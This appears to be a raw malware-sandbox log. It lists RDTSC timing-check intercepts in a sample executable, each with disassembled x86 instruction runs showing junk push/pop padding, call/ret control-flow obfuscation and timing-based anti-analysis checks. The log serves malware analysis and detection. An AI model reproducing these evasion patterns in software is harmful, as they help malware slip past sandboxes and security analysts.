Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8A33C second address: E8A378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F2F08CCF06Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2F08CCF06Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2F08CCF074h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8A378 second address: E8A37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8A37C second address: E8A382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E18FFE second address: E19004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E19004 second address: E19009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E19009 second address: E1903D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2F08D1BEB7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E1903D second address: E19051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2F08CCF06Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E19051 second address: E19057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8F1B8 second address: E8F1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E06993 second address: E06999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E06999 second address: E069B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F2F08CCF071h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8E075 second address: E8E079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E509C6 second address: E509D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2F08CCF066h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E509D1 second address: E509EB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2F08D1BEAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E509EB second address: E3815A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2F08CCF068h 0x0000000c popad 0x0000000d nop 0x0000000e mov ecx, 769E9135h 0x00000013 lea eax, dword ptr [ebp+12491751h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F2F08CCF068h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 or di, A5A5h 0x00000038 jmp 00007F2F08CCF075h 0x0000003d nop 0x0000003e jmp 00007F2F08CCF073h 0x00000043 push eax 0x00000044 jmp 00007F2F08CCF077h 0x00000049 nop 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007F2F08CCF068h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 call dword ptr [ebp+122D17F0h] 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F2F08CCF071h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E50F5E second address: E50F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51077 second address: E51090 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f je 00007F2F08CCF078h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51090 second address: E51094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E511CE second address: E511D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E511D2 second address: E511E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2F08D1BEA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5126E second address: E51275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E513DC second address: E513E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E513E2 second address: E513E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E5195B second address: E5197B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2F08D1BEA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51AC8 second address: E51AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51AD5 second address: E51ADB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51ADB second address: E51AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2F08CCF066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51C89 second address: E51C8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51C8E second address: E51CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnp 00007F2F08CCF073h 0x0000000f jmp 00007F2F08CCF06Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2F08CCF06Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51CB7 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F2F08D1BEA8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 and ecx, 0D268B15h 0x00000028 lea eax, dword ptr [ebp+12491751h] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F2F08D1BEA8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D1BE6h], ebx 0x0000004e nop 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51D13 second address: E51D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51D17 second address: E51D25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51D25 second address: E51D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E51D29 second address: E51D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8E605 second address: E8E629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2F08CCF066h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F2F08CCF066h 0x00000017 jmp 00007F2F08CCF06Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8E629 second address: E8E641 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F08D1BEA6h 0x00000008 je 00007F2F08D1BEA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F2F08D1BEA6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8E782 second address: E8E786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8E8EA second address: E8E92A instructions: 0x00000000 rdtsc 0x00000002 je 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2F08D1BEB5h 0x0000000f jmp 00007F2F08D1BEB7h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F2F08D1BEA6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E8EA73 second address: E8EA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9380F second address: E93817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93297 second address: E9329B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9329B second address: E932DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2F08D1BEB8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E932DB second address: E932DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F48 second address: E93F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F54 second address: E93F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2F08CCF066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F5E second address: E93F64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F64 second address: E93F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF06Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F78 second address: E93F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E93F7C second address: E93F94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F08CCF066h 0x00000008 jmp 00007F2F08CCF06Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E94159 second address: E9418D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2F08D1BEA6h 0x0000000a popad 0x0000000b push edx 0x0000000c ja 00007F2F08D1BEA6h 0x00000012 jmp 00007F2F08D1BEB3h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jo 00007F2F08D1BEA6h 0x00000020 jg 00007F2F08D1BEA6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9418D second address: E94197 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E94579 second address: E9457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9457E second address: E94586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9B008 second address: E9B025 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2F08D1BEA6h 0x00000008 jmp 00007F2F08D1BEB3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E9AD32 second address: E9AD38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0EFA second address: EA0EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0EFE second address: EA0F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0F04 second address: EA0F10 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08D1BEAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0F10 second address: EA0F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0647 second address: EA064D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA064D second address: EA066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a js 00007F2F08CCF066h 0x00000010 pop ecx 0x00000011 jmp 00007F2F08CCF06Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA07BA second address: EA07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2F08D1BEA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0C20 second address: EA0C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0C26 second address: EA0C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0C30 second address: EA0C3A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F08CCF066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0C3A second address: EA0C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jl 00007F2F08D1BEBEh 0x0000000d jp 00007F2F08D1BEB2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA0C4F second address: EA0C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA4C7B second address: EA4C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F2F08D1BEA6h 0x0000000c jmp 00007F2F08D1BEAFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E08461 second address: E08467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E08467 second address: E0846F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E0846F second address: E084A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2F08CCF075h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2F08CCF073h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: E084A1 second address: E084A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA416C second address: EA4170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA4170 second address: EA4174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA4443 second address: EA4458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2F08CCF06Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA4458 second address: EA4480 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jg 00007F2F08D1BEA6h 0x0000000f jmp 00007F2F08D1BEB7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA45A4 second address: EA45C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2F08CCF06Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EAA52A second address: EAA533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EAA533 second address: EAA539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EAA539 second address: EAA53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9108 second address: EA9112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2F08CCF066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9112 second address: EA9116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9116 second address: EA911C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA927D second address: EA9283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9283 second address: EA9287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9287 second address: EA92A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA92A6 second address: EA92B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA92B6 second address: EA92BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA9556 second address: EA9570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF076h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA983E second address: EA984B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EA984B second address: EA9865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF076h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB1159 second address: EB116C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08D1BEADh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
